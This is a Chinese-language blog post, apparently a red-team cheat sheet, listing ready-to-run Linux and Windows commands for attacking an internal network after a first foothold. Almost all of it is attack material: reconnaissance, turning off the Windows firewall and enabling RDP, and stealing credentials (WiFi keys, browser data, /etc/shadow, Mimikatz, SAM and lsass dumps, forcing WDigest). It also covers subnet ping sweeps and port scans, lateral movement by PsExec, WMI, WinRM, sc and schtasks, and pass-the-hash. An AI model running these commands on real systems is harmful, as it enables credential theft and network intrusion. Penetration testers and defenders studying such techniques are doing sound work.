内网入侵


主机信息

基本信息

  • Linux
#系统版本
uname -a
#开机时间
who -r
#进程列表
ps -aux
#历史命令
cat ~/.*sh_history
#本地服务
systemctl --type=service
#判断Docker
ls -la /.dockerenv
cat /proc/1/cgroup | grep docker
  • Windows
#系统版本
systeminfo
#进程列表
tasklist
#全部盘符
fsutil fsinfo drives
#开机时间
net statistics workstation
#应用软件
wmic product get name,version
#本地服务
wmic service get name,pathname,startmode
#启动程序
wmic startup get caption,command,location
#PowerShell历史
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

用户信息

  • Linux
#在线用户
w || who
#用户列表
cat /etc/passwd | grep /bin/bash
#管理员组
cat /etc/passwd | awk -F: "\$3==0"
  • Windows
#用户列表
net user
#在线用户
query user
#用户权限
whoami /all
#管理员组
net localgroup Administrators

网络信息

  • Linux
#ARP缓存
arp -a
#网络配置
ifconfig
#路由信息
route -n
#端口连接
netstat -pantu
#Hosts文件
cat /etc/hosts
#代理配置
env | grep -i proxy
  • Windows
#ARP缓存
arp -a
#共享列表
net share
#路由信息
route print
#端口连接
netstat -nao
#网络配置
ipconfig /all
#DNS缓存
ipconfig /displaydns
#Hosts文件
type C:\Windows\System32\drivers\etc\hosts
#代理配置
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v Proxy*

远程管理

  • Linux
#SSH端口
grep -Ei "Port [0-9]+" /etc/ssh/sshd_config
#SSH日志
last | grep -Eo "([0-9]{1,3}\.){3}[0-9]{1,3}" | sort -u
#SSH历史
find / -name known_hosts | xargs grep -Eho "([0-9]{1,3}\.){3}[0-9]{1,3}" | sort -u
  • Windows
#RDP启用
wmic RDTOGGLE where ServerName="%COMPUTERNAME%" call SetAllowTSConnections 1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
#RDP端口
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
#RDP历史
Get-ChildItem 'Registry::HKEY_USERS\*\Software\Microsoft\Terminal Server Client\Servers\*' 2> $null
#RDP日志
Get-EventLog Security -InstanceId 4624 | ?{$_.Message -match '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'} | %{$Matches.Values} | Sort -Unique

防火墙

  • Windows
#查看状态
netsh advfirewall show allprofiles
#关闭服务
netsh firewall set opmode mode=disable
netsh advfirewall set allprofiles state off
#端口放行
netsh firewall add portopening name="RDP" mode=enable protocol=TCP port=3389
netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=TCP localport=3389
#程序放行
netsh firewall add allowedprogram name="File" mode=enable program="C:\File.exe"
netsh advfirewall firewall add rule name="File" dir=in action=allow program="C:\File.exe"

域内信息

凭证收集

WiFi密码

  • Linux
cd /etc/NetworkManager/system-connections && grep -rH "psk=" | sed "s/psk=//"
  • Windows
netsh wlan show profile name="WIFI名称" key=clear

Web数据

hack-browser-data -b all -f csv --cc --dir Temp

Hash凭证

  • Linux
cat /etc/shadow | awk -F: "length(\$2)>3"
  • Windows
#Mimikatz
mimikatz "privilege::debug" "sekurlsa::logonpasswords" "exit"
#Reg+Mimikatz
reg save HKLM\SAM SAM.hive
reg save HKLM\SYSTEM SYSTEM.hive
mimikatz "lsadump::sam /sam:SAM.hive /system:SYSTEM.hive" "exit"
#ProcDump+Mimikatz
ProcDump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords full" "exit"
#开启Wdigest Auth
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

网络探测

Ping存活

  • Linux
echo 192.168.0.{1..254} | xargs -n1 -P 10 ping -w 1 -c 1 | grep -i TTL | grep -Eo "([0-9]{1,3}\.){3}[0-9]{1,3}"
  • Windows
for /L %I in (1, 1, 254) do @ping -w 1 -n 1 192.168.0.%I | findstr /I "TTL"

端口扫描

  • Linux
for IP in 192.168.0.{1..254}; do echo -n "22,80,443,3389" | xargs -P 10 -d "," -i timeout 1 bash -c "echo >/dev/tcp/$IP/{} && echo '$IP:{} open'" 2>/dev/null; done
  • Windows
ForEach($IP in (1..254|%{'192.168.1.'+$_})){ForEach($Port in 22,80,443,3389){$TCP=New-Object Net.Sockets.TcpClient;if($TCP.BeginConnect($IP,$Port,$NULL,$NULL).AsyncWaitHandle.WaitOne(300,$False)){$IP+':'+$Port+' open'}$TCP.Close()}}

横向移动

IPC$管道

  • IPC
net use \\192.168.0.1\IPC$ Password /user:Domain\User
net use \\192.168.0.1\IPC$ /del
  • Sc
sc \\192.168.0.1 create 服务名称 binPath= "执行命令"
sc \\192.168.0.1 start  服务名称
sc \\192.168.0.1 delete 服务名称
  • WMI
wmic /node:192.168.0.1 /user:User /password:Password process call create "执行命令"
  • PsExec
psexec -accepteula \\192.168.0.1 -u User -p Password -s "执行命令"
  • WinRM
winrs -r:http://192.168.0.1:5985 -u:User -p:Password "执行命令"
  • Schtasks
schtasks /create /s 192.168.0.1 /u User /p Password /tn 任务名称 /ru SYSTEM /sc onCE /st 12:00 /tr "执行命令"
schtasks /run /s 192.168.0.1 /u User /p Password /tn 任务名称 /i
schtasks /delete /s 192.168.0.1 /u User /p Password /tn 任务名称 /f

哈希传递

  • Mimikatz
#PTK
mimikatz "privilege::debug" "sekurlsa::ekeys" "exit"
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WORKGROUP /aes256:32ed87bdb5fdc5e9cba88547376818d4" "exit"
#PTH
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WORKGROUP /ntlm:32ed87bdb5fdc5e9cba88547376818d4" "exit"
#RDP
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WORKGROUP /ntlm:32ed87bdb5fdc5e9cba88547376818d4 \"/run:mstsc.exe /restrictedadmin\"" "exit"

票据传递

NTLM中继


文章作者: DongHuangT1
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC 4.0 许可协议。转载请注明来源 DongHuangT1 !